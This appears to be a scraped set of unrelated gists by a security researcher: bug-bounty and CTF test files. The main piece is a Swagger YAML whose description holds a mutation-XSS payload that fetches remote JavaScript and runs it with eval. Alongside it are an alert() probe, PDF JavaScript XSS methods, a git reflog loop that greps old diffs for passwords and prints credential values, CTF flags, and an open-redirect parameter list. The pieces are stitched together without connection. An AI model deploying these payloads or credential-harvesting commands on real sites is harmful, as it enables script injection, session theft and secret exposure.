| { | |
| "url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml", | |
| "name": "Foo" | |
| } | |
| ] | |
| } |
| alert(/XSS by AJ/); |
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=fetch('https://gist.githubusercontent.com/ajdumanhug/5026beb333226700c029b46324234e17/raw/357a217fb6499a2bce747e7d545fc84f3f77b921/xss.js').then(function(res){res.text().then(function(data){eval(data)})}) src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
| [ | |
| { | |
| "text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}", | |
| "author": "AJ Dumanhug" | |
| } | |
| ] |
Finding creds in git repos is awesome.
$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
| app.alert\("XSS"\); | |
| app.response\("XSS"\); | |
| app.launchURL\("https://example.com"\); | |
| Other Methods: | |
| - browseForDoc |
| important = "" | |
| pip_important = "flag{h4ckst33tb0ys}" | |
| import base64 | |
| randomvar = important.encode('ascii') | |
| important_tottaly = base64.b64encode(randomvar) | |
| import random | |
| nothin_important = important_tottaly.decode('ascii') | |
| pip_important = "" | |
| supa_strong = "" | |
| for n in nothin_important: |
| BOOK_TRAVEL, CONTACT_US, DONATE, DONATE_NOW, DOWNLOAD, GET_DIRECTIONS, GO_LIVE, INTERESTED, LEARN_MORE, LIKE_PAGE, MESSAGE_PAGE, SAVE, SEND_TIP, SHOP_NOW, SIGN_UP, VIEW_INSTAGRAM_PROFILE, INSTAGRAM_MESSAGE, LOYALTY_LEARN_MORE, PURCHASE_GIFT_CARDS, PAY_TO_ACCESS, GET_MOBILE_APP, INSTALL_MOBILE_APP, USE_MOBILE_APP, INSTALL_APP, USE_APP, PLAY_GAME, WATCH_VIDEO, WATCH_MORE, OPEN_LINK, NO_BUTTON, LISTEN_MUSIC, MOBILE_DOWNLOAD, GET_OFFER, GET_OFFER_VIEW, BUY_NOW, BUY_TICKETS, UPDATE_APP, BET_NOW, ADD_TO_CART, ORDER_NOW, SELL_NOW, GET_SHOWTIMES, LISTEN_NOW, GET_EVENT_TICKETS, SEARCH_MORE, PRE_REGISTER, SWIPE_UP_PRODUCT, SWIPE_UP_SHOP, CALL, MISSED_CALL, CALL_NOW, CALL_ME, APPLY_NOW, BUY, GET_QUOTE, SUBSCRIBE, RECORD_NOW, VOTE_NOW, GIVE_FREE_RIDES, REGISTER_NOW, OPEN_MESSENGER_EXT, EVENT_RSVP, CIVIC_ACTION, SEND_INVITES, REFER_FRIENDS, REQUEST_TIME, SEE_MENU, WHATSAPP_MESSAGE, SEARCH, TRY_IT, TRY_ON, LINK_CARD, DIAL_CODE, FIND_YOUR_GROUPS |
| enable_tc_mode | |
| guest-access traffic-class internet internet | |
| guest-access traffic-class 1 name xwf | |
| guest-access traffic-class 1 permit *.expresswifi.com | |
| guest-access traffic-class 1 permit xwf-static.xx.fbcdn.net | |
| guest-access traffic-class 1 permit xwf-scontent.xx.fbcdn.net | |
| guest-access traffic-class 1 permit xwf.facebook.com | |
| guest-access traffic-class 1 permit *.xwf.fyi | |
| guest-access traffic-class 1 permit h.facebook.com | |
| guest-access traffic-class 1 permit graph.expresswifi.com |
| dest | |
| redirect | |
| uri | |
| path | |
| continue | |
| url | |
| window | |
| next | |
| data | |
| reference |